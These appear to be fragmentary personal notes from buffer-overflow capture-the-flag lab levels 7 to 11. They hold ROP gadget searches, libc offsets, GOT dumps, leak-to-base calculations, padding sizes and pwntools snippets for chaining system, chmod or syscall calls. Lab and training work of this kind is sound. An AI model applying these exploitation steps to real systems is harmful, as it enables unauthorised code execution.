0x7a0 // 1952
0x8a0 // 2208

256 // diff
0x7fff02bc8480 // buff
base pointer rbp: 0x7fff02bc8c40


===========================

0x7ffdce89b198:	94377960985024
0x7ffd8055c0e8:	93904106910144

================ 7 =============
ropium> find rax = 0x3b
0x0000000000036174 : pop rax ; ret // ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep 'pop rax'

0x00000000001b45bd : /bin/sh // ROPgadget --binary ./usr/lib/x86_64-linux-gnu/libc-2.31.so --string "/bin/sh"
find rdi = 0x1b45bd
ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep 'pop rdi'
0x0000000000023b6a : pop rdi ; ret

# The function "system" in libc is located at 0x7f4a558cf290
ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so --string "chmod"
0x0000000000016db0 : chmod
0x0000000000017901 : chmod
0x0000000000017988 : chmod
0x00000000001eedc1 : chmod
0x00000000001ef558 : chmod

    hacker@buffer-overflow-level-7:~$ ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so --string "system"
    Strings information
    ============================================================
    0x0000000000014e0f : system
    0x00000000000150e8 : system
    0x00000000001b3d59 : system
    0x00000000001b485d : system
    0x00000000001b49c5 : system
    0x00000000001b4a32 : system
    0x00000000001b5288 : system
    0x00000000001b5640 : system
    0x00000000001b5fb1 : system
    0x00000000001b8ea4 : system
    0x00000000001b93b2 : system
    0x00000000001b93d6 : system
    0x00000000001b9534 : system
    0x00000000001b9558 : system
    0x00000000001bacdd : system

[0x55bf2c75b020] puts@GLIBC_2.2.5  →  0x55bf2c758040

00000000000010f0 <puts@plt>:
    10f0:	f3 0f 1e fa          	endbr64 
    10f4:	f2 ff 25 25 2f 00 00 	bnd jmpq *0x2f25(%rip)        # 4020 <puts@GLIBC_2.2.5>


gef➤  got

GOT protection: Partial RelRO | GOT functions: 10
 
[0x55bf2c75b018] putchar@GLIBC_2.2.5  →  0x55bf2c758030
[0x55bf2c75b020] puts@GLIBC_2.2.5  →  0x55bf2c758040
[0x55bf2c75b028] strlen@GLIBC_2.2.5  →  0x55bf2c758050
[0x55bf2c75b030] setbuf@GLIBC_2.2.5  →  0x7f9a64074ad0
[0x55bf2c75b038] printf@GLIBC_2.2.5  →  0x55bf2c758070
[0x55bf2c75b040] __assert_fail@GLIBC_2.2.5  →  0x55bf2c758080
[0x55bf2c75b048] memset@GLIBC_2.2.5  →  0x55bf2c758090
[0x55bf2c75b050] close@GLIBC_2.2.5  →  0x55bf2c7580a0
[0x55bf2c75b058] read@GLIBC_2.2.5  →  0x55bf2c7580b0
[0x55bf2c75b060] dlsym@GLIBC_2.2.5  →  0x55bf2c7580c0
gef➤  x 0x55bf2c75b020
0x55bf2c75b020 <puts@got.plt>:	0x2c758040
gef➤  x 0x55bf2c758040
0x55bf2c758040:	0xfa1e0ff3
gef➤  


hacker@buffer-overflow-level-7:/challenge$ objdump -T /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep puts
0000000000084420 g    DF .text	00000000000001dc  GLIBC_2.2.5 _IO_puts
0000000000084420  w   DF .text	00000000000001dc  GLIBC_2.2.5 puts
0000000000124330 g    DF .text	00000000000004f4  GLIBC_2.2.5 putspent
0000000000126000 g    DF .text	00000000000002d8  GLIBC_2.10  putsgent
0000000000082ce0  w   DF .text	0000000000000180  GLIBC_2.2.5 fputs
0000000000082ce0 g    DF .text	0000000000000180  GLIBC_2.2.5 _IO_fputs
000000000008e320  w   DF .text	000000000000009f  GLIBC_2.2.5 fputs_unlocked


ROPgadget --binary /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep 'pop rsi'
0x000000000002601f : pop rsi ; ret


hacker@buffer-overflow-level-7:~$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
   237: 0000000000153ae0   103 FUNC    GLOBAL DEFAULT   15 svcerr_systemerr@@GLIBC_2.2.5
   619: 0000000000052290    45 FUNC    GLOBAL DEFAULT   15 __libc_system@@GLIBC_PRIVATE
  1430: 0000000000052290    45 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.2.5
hacker@buffer-overflow-level-7:~$ ^C
readelf -s /usr/lib/x86_64-linux-gnu/libc-2.31.so | grep system
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep chmod



===================== 8 notes ======================
pop_rdi = base + 0x23b6a 
pop_rsi = base + 0x2601f 
pop_rdx = base + 0x142c92 
pop_rax = base + 0x36174
syscall = base + 0x2284d

base = int(leak[:-1],16) - 0x23f90 - 0xF3# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep __libc_start_main


p.recvuntil(b"is: ")
leak = p.recvline()


=============== 9 notes ================================
[*] Main start: 0x40127d
[*] Puts plt: 0x4010d4
[*] pop rdi; ret  gadget: 0x23b6a
[*] puts GOT @ 0x404020

base pointer rbp: 0x7ffec4189e10
it will be stored: 0x7ffec4189610

# 404020 <puts@GLIBC_2.2.5>

gef➤  got

GOT protection: Partial RelRO | GOT functions: 9
 
[0x404018] putchar@GLIBC_2.2.5  →  0x401030
[0x404020] puts@GLIBC_2.2.5  →  0x401040
[0x404028] strlen@GLIBC_2.2.5  →  0x401050
[0x404030] setbuf@GLIBC_2.2.5  →  0x7f82f3aebad0
[0x404038] printf@GLIBC_2.2.5  →  0x401070
[0x404040] __assert_fail@GLIBC_2.2.5  →  0x401080
[0x404048] memset@GLIBC_2.2.5  →  0x401090
[0x404050] close@GLIBC_2.2.5  →  0x4010a0
[0x404058] read@GLIBC_2.2.5  →  0x4010b0


gef➤  x 0x404020
0x404020 <puts@got.plt>:	0x00401040
gef➤  x/10i  0x00401040
   0x401040:	endbr64 
   0x401044:	push   0x1
   0x401049:	bnd jmp 0x401020
   0x40104f:	nop
   0x401050:	endbr64 
   0x401054:	push   0x2
   0x401059:	bnd jmp 0x401020
   0x40105f:	nop
   0x401060:	endbr64 
   0x401064:	push   0x3
gef➤  




hacker@buffer-overflow-level-9:/challenge$ objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep puts
0000000000084420 g    DF .text	00000000000001dc  GLIBC_2.2.5 _IO_puts
0000000000084420  w   DF .text	00000000000001dc  GLIBC_2.2.5 puts    # this value offset
0000000000124330 g    DF .text	00000000000004f4  GLIBC_2.2.5 putspent
0000000000126000 g    DF .text	00000000000002d8  GLIBC_2.10  putsgent
0000000000082ce0  w   DF .text	0000000000000180  GLIBC_2.2.5 fputs
0000000000082ce0 g    DF .text	0000000000000180  GLIBC_2.2.5 _IO_fputs
000000000008e320  w   DF .text	000000000000009f  GLIBC_2.2.5 fputs_unlocked
hacker@buffer-overflow-level-9:/challenge$ 


hex(0x401040 - 0x84420) = 0x37cc20  // libc base address


00000000004010d0 <puts@plt>:
  4010d0:       f3 0f 1e fa             endbr64 
  4010d4:       f2 ff 25 45 2f 00 00    bnd jmpq *0x2f45(%rip)        # 404020 <puts@GLIBC_2.2.5>
  4010db:       0f 1f 44 00 00          nopl   0x0(%rax,%rax,1)


hacker@buffer-overflow-level-9:/challenge$ ROPgadget --binary ./babystack_level9 | grep 'pop rdi'
0x0000000000401553 : pop rdi ; ret


ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | grep 'pop rdi'   //  pop_rdi = 0x23b6a
ROPgadget --binary ./babystack_level9 | grep 'pop rdi' // pop_rdi = 0x401553
1st times - $\xf1j
2nd times - \xb4\x8eC\xb7\x7f

\xa4\xc4\x10\x7f
 \xb4\x8b\xbb\xa0\x7f
 $\x8f\xf0+

 ROPgadget --binary ./babystack_level9 | grep 'pop rsi' # no output
 ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | grep 'pop rsi'   

 ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --string "/flag"

 hacker@buffer-overflow-level-9:~$ ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --string "group"
Strings information
============================================================
0x0000000000013c2a : group
0x0000000000013d14 : group
0x0000000000013e96 : group
0x00000000000145f2 : group
0x0000000000014b7c : group
0x0000000000015dd5 : group
0x0000000000015e3e : group
0x0000000000015edc : group
0x0000000000015f99 : group
0x0000000000017bef : group
0x00000000001b59e3 : group
0x00000000001b59ee : group
0x00000000001b5b5c : group
0x00000000001b7788 : group
0x00000000001b7a69 : group
0x00000000001ba6ce : group
0x00000000001bc3cc : group
0x00000000001bc60a : group
0x00000000001eb190 : group
0x00000000001eb1dc : group
0x00000000001eb1f3 : group
hacker@buffer-overflow-level-9:~$ 

ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | grep 'pop rsi'
0x000000000002601f : pop rsi ; ret

ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | grep 'pop rax' 
0x0000000000036174 : pop rax ; ret

hacker@buffer-overflow-level-9:/challenge$ ROPgadget --binary ./babystack_level9 | grep 'pop rax'   # returned nothing

hacker@buffer-overflow-level-9:/challenge$ readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep chmod
   125: 000000000010db90    37 FUNC    WEAK   DEFAULT   15 fchmod@@GLIBC_2.2.5
   631: 000000000010db60    37 FUNC    WEAK   DEFAULT   15 chmod@@GLIBC_2.2.5
  1015: 000000000010dbe0   108 FUNC    GLOBAL DEFAULT   15 fchmodat@@GLIBC_2.4
  2099: 000000000010dbc0    24 FUNC    GLOBAL DEFAULT   15 lchmod@@GLIBC_2.3.2


hacker@buffer-overflow-level-9:/challenge$ ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 --only "syscall"
Gadgets information
============================================================
0x000000000002284d : syscall

Unique gadgets found: 1
hacker@buffer-overflow-level-9:/challenge$ 

 0x4014d8 <main+603>:	call   0x401140 <read@plt>

padding = 2000 - 2300 not worked


T protection: Partial RelRO | GOT functions: 9
 
[0x404018] putchar@GLIBC_2.2.5  →  0x401030
[0x404020] puts@GLIBC_2.2.5  →  0x401040
[0x404028] strlen@GLIBC_2.2.5  →  0x401050
[0x404030] setbuf@GLIBC_2.2.5  →  0x7fa87ebdbad0
[0x404038] printf@GLIBC_2.2.5  →  0x401070
[0x404040] __assert_fail@GLIBC_2.2.5  →  0x401080
[0x404048] memset@GLIBC_2.2.5  →  0x401090
[0x404050] close@GLIBC_2.2.5  →  0x4010a0
[0x404058] read@GLIBC_2.2.5  →  0x4010b0


objdump -M intel -d /challenge/babystack_level9
  4014bf:	e8 3c fc ff ff       	call   401100 <printf@plt>
  4014c4:	48 8d 85 00 f8 ff ff 	lea    rax,[rbp-0x800]
  4014cb:	ba e0 08 00 00       	mov    edx,0x8e0
  4014d0:	48 89 c6             	mov    rsi,rax
  4014d3:	bf 00 00 00 00       	mov    edi,0x0
  4014d8:	e8 63 fc ff ff       	call   401140 <read@plt>
  4014dd:	b8 00 00 00 00       	mov    eax,0x0
  4014e2:	c9                   	leave  
  4014e3:	c3                   	ret  


  0x404058 + 0x800 = 0x404858

====================================== 10 ======================================

0x170 = buffer size = 368
0x270 = read buffer = 624
diff = 0x270 - 0x170 = 256

hacker@buffer-overflow-level-10:/challenge$ ROPgadget --binary babystack_level10 | grep 'pop rdi'
0x0000000000401553 : pop rdi ; ret

hacker@buffer-overflow-level-10:/challenge$ objdump -M intel -d babystack_level10 | less
4014c7:       e8 34 fc ff ff          call   401100 <printf@plt>
4014cc:       48 8d 85 70 fe ff ff    lea    rax,[rbp-0x190]
4014d3:       ba 70 02 00 00          mov    edx,0x270
4014d8:       48 89 c6                mov    rsi,rax
4014db:       bf 00 00 00 00          mov    edi,0x0
4014e0:       e8 5b fc ff ff          call   401140 <read@plt>

// worked problem 9 values 
new_rbp = 0x404858
main = 0x4014c4

gef➤  got

GOT protection: Partial RelRO | GOT functions: 9
 
[0x404018] putchar@GLIBC_2.2.5  →  0x401030
[0x404020] puts@GLIBC_2.2.5  →  0x401040
[0x404028] strlen@GLIBC_2.2.5  →  0x401050
[0x404030] setbuf@GLIBC_2.2.5  →  0x7f13d3c3aad0
[0x404038] printf@GLIBC_2.2.5  →  0x401070
[0x404040] __assert_fail@GLIBC_2.2.5  →  0x401080
[0x404048] memset@GLIBC_2.2.5  →  0x401090
[0x404050] close@GLIBC_2.2.5  →  0x4010a0
[0x404058] read@GLIBC_2.2.5  →  0x4010b0


0x404058 + 0x190 = 0x4041e8 = read got  + read argument offset which is [rbp-0x190]

ROPgadget --binary /lib/x86_64-linux-gnu/libc.so.6 | grep puts # not worked for puts offset
The command "objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep puts" will search for the symbol "puts" in the dynamic symbol table of the C standard library file "libc.so.6" located in the "/lib/x86_64-linux-gnu/" directory of a Linux system.
hacker@buffer-overflow-level-10:/challenge$ objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep puts
0000000000084420 g    DF .text	00000000000001dc  GLIBC_2.2.5 _IO_puts
0000000000084420  w   DF .text	00000000000001dc  GLIBC_2.2.5 puts
0000000000124330 g    DF .text	00000000000004f4  GLIBC_2.2.5 putspent
0000000000126000 g    DF .text	00000000000002d8  GLIBC_2.10  putsgent
0000000000082ce0  w   DF .text	0000000000000180  GLIBC_2.2.5 fputs
0000000000082ce0 g    DF .text	0000000000000180  GLIBC_2.2.5 _IO_fputs
000000000008e320  w   DF .text	000000000000009f  GLIBC_2.2.5 fputs_unlocked
hacker@buffer-overflow-level-10:/challenge$ 

disassemble main # prints disassembly of main function


====================================== 11 ==============================================
0000000000001330 <win>:
buffer = 0x2f0 = 752
read = 0x3f0 = 1008

16ca:	e8 a1 fa ff ff       	callq  1170 <printf@plt>
16cf:	48 8d 85 00 fd ff ff 	lea    -0x300(%rbp),%rax
16d6:	ba f0 03 00 00       	mov    $0x3f0,%edx
16db:	48 89 c6             	mov    %rax,%rsi
16de:	bf 00 00 00 00       	mov    $0x0,%edi
16e3:	e8 c8 fa ff ff       	callq  11b0 <read@plt>

0000000000001130 <puts@plt>:
    1130:	f3 0f 1e fa          	endbr64 
    1134:	f2 ff 25 e5 2e 00 00 	bnd jmpq *0x2ee5(%rip)        # 4020 <puts@GLIBC_2.2.5>
    113b:	0f 1f 44 00 00       	nopl   0x0(%rax,%rax,1)

───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  got

GOT protection: Partial RelRO | GOT functions: 14
 
[0x5646aea24018] putchar@GLIBC_2.2.5  →  0x5646aea21030
[0x5646aea24020] puts@GLIBC_2.2.5  →  0x5646aea21040
[0x5646aea24028] strlen@GLIBC_2.2.5  →  0x5646aea21050
[0x5646aea24030] __stack_chk_fail@GLIBC_2.4  →  0x5646aea21060
[0x5646aea24038] setbuf@GLIBC_2.2.5  →  0x7fdbbd834ad0
[0x5646aea24040] printf@GLIBC_2.2.5  →  0x5646aea21080
[0x5646aea24048] __assert_fail@GLIBC_2.2.5  →  0x5646aea21090
[0x5646aea24050] memset@GLIBC_2.2.5  →  0x5646aea210a0
[0x5646aea24058] close@GLIBC_2.2.5  →  0x5646aea210b0
[0x5646aea24060] read@GLIBC_2.2.5  →  0x5646aea210c0
[0x5646aea24068] sendfile@GLIBC_2.2.5  →  0x5646aea210d0
[0x5646aea24070] open@GLIBC_2.2.5  →  0x5646aea210e0
[0x5646aea24078] __isoc99_scanf@GLIBC_2.7  →  0x5646aea210f0
[0x5646aea24080] exit@GLIBC_2.2.5  →  0x5646aea21100


0x5646aea24080 + 0x300 = 0x5646aea24380

hacker@buffer-overflow-level-11:/challenge$ ROPgadget --binary babystack_level11 | grep 'pop rdi'
0x0000000000001773 : pop rdi ; ret

hacker@buffer-overflow-level-11:/challenge$ objdump -T /lib/x86_64-linux-gnu/libc.so.6 | grep puts
0000000000084420 g    DF .text	00000000000001dc  GLIBC_2.2.5 _IO_puts
0000000000084420  w   DF .text	00000000000001dc  GLIBC_2.2.5 puts
0000000000124330 g    DF .text	00000000000004f4  GLIBC_2.2.5 putspent
0000000000126000 g    DF .text	00000000000002d8  GLIBC_2.10  putsgent
0000000000082ce0  w   DF .text	0000000000000180  GLIBC_2.2.5 fputs
0000000000082ce0 g    DF .text	0000000000000180  GLIBC_2.2.5 _IO_fputs
000000000008e320  w   DF .text	000000000000009f  GLIBC_2.2.5 fputs_unlocked
hacker@buffer-overflow-level-11:/challenge$ 


gef➤  info frame
│Stack level 0, frame at 0x7ffcc3b922a0:
│ rip = 0x55d80d58d37f in main; saved rip = 0x7f124ccd9083
│ Arglist at 0x7ffcc3b92290, args: 
│ Locals at 0x7ffcc3b92290, Previous frame's sp is 0x7ffcc3b922a0
│ Saved registers:
│  rip at 0x7ffcc3b92298
│gef➤  


def hex_char(i):
    l = ['A','B','C','D','E','F']
    j = i
    s1 =""
    if i >= 10:
        s1 = s1 + l[j-10]
    else:
        s1 = s1 + str(j)
    # print(s1)
    return s1
        
for i in range(16):
    s1 = hex_char(i)
    for j in range(16):
        s2 = hex_char(j)
        new_str = r'\x83\x{}{}'.format(s1, s2)
        print(new_str)

gef➤  info frame
Stack level 0, frame at 0x7fff4240fe50:
 rip = 0x561dbe57937f in main; saved rip = 0x7f1d1ff66083
 Arglist at 0x7fff4240fe40, args: 
 Locals at 0x7fff4240fe40, Previous frame's sp is 0x7fff4240fe50
 Saved registers:
  rip at 0x7fff4240fe48
gef➤  x 0x7f1d1ff66083
0x7f1d1ff66083 <__libc_start_main+243>:	0xb6e8c789
gef➤  x/10i 0x7f1d1ff66083
   0x7f1d1ff66083 <__libc_start_main+243>:	mov    edi,eax                            // return address
   0x7f1d1ff66085 <__libc_start_main+245>:	call   0x7f1d1ff88a40 <__GI_exit>
   0x7f1d1ff6608a <__libc_start_main+250>:	mov    rax,QWORD PTR [rsp+0x8]
   0x7f1d1ff6608f <__libc_start_main+255>:	lea    rdi,[rip+0x18fdd2]        # 0x7f1d200f5e68
   0x7f1d1ff66096 <__libc_start_main+262>:	mov    rsi,QWORD PTR [rax]
   0x7f1d1ff66099 <__libc_start_main+265>:	xor    eax,eax
   0x7f1d1ff6609b <__libc_start_main+267>:	call   QWORD PTR [rdx+0x1d0]
   0x7f1d1ff660a1 <__libc_start_main+273>:	jmp    0x7f1d1ff65ff6 <__libc_start_main+102>
   0x7f1d1ff660a6 <__libc_start_main+278>:	mov    rax,QWORD PTR [rip+0x1cd3cb]        # 0x7f1d20133478 <__libc_pthread_functions+312>
   0x7f1d1ff660ad <__libc_start_main+285>:	ror    rax,0x11
gef➤      
      

 0x00007f1d1ff66083 <+243>:	mov    edi,eax

# readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep __libc_start_main
 2238: 0000000000023f90   483 FUNC    GLOBAL DEFAULT   15 __libc_start_main@@GLIBC_2.2.5

 base = int(leak[:-1],16) - 0x23f90 - 0xF3  # <__libc_start_main+243>    0xF3 = 243

│gef➤  x 0x7ffc7b46a080
│0x7ffc7b46a080: 0x4242424242424242
│gef➤  x/gx 0x7ffc7b46a080
│0x7ffc7b46a080: 0x4242424242424242
│gef➤  x (0x7ffc7b46a080-8)
│0x7ffc7b46a078: 0xd62854c180c5eb00
│gef➤  x buf
│0x0:    Cannot access memory at address 0x0
│gef➤  p addr
│No symbol "addr" in current context.
│gef➤  p &addr
│No symbol "addr" in current context.
│gef➤  print &addr
│No symbol "addr" in current context.
│gef➤  print &value
│No symbol "value" in current context.
│gef➤  print &buffer
│$1 = (char (*)[30]) 0x7fbb780f5160 <buffer>
│gef➤  x 0x7fbb780f5160
│0x7fbb780f5160 <buffer>:        0x0000000000000000
│gef➤  x (0x7ffc7b46a080+8)
│0x7ffc7b46a088: 0x00007fbb77f2800a
│gef➤  info frame
│Stack level 0, frame at 0x7ffc7b46a090:
│ rip = 0x564c461aa6e8 in main; saved rip = 0x7fbb77f2800a
│ Arglist at 0x7ffc7b469d28, args: 
│ Locals at 0x7ffc7b469d28, Previous frame's sp is 0x7ffc7b46a090
│ Saved registers:
│  rbp at 0x7ffc7b46a080, rip at 0x7ffc7b46a088
│gef➤  x 0x564c461aa6e8
│0x564c461aa6e8 <main+873>:      0x4d8b4800000000b8
│gef➤  x 0x7fbb77f2800a
│0x7fbb77f2800a <__libc_start_main+122>: 0x8b48d3ff108b4814
│gef➤  

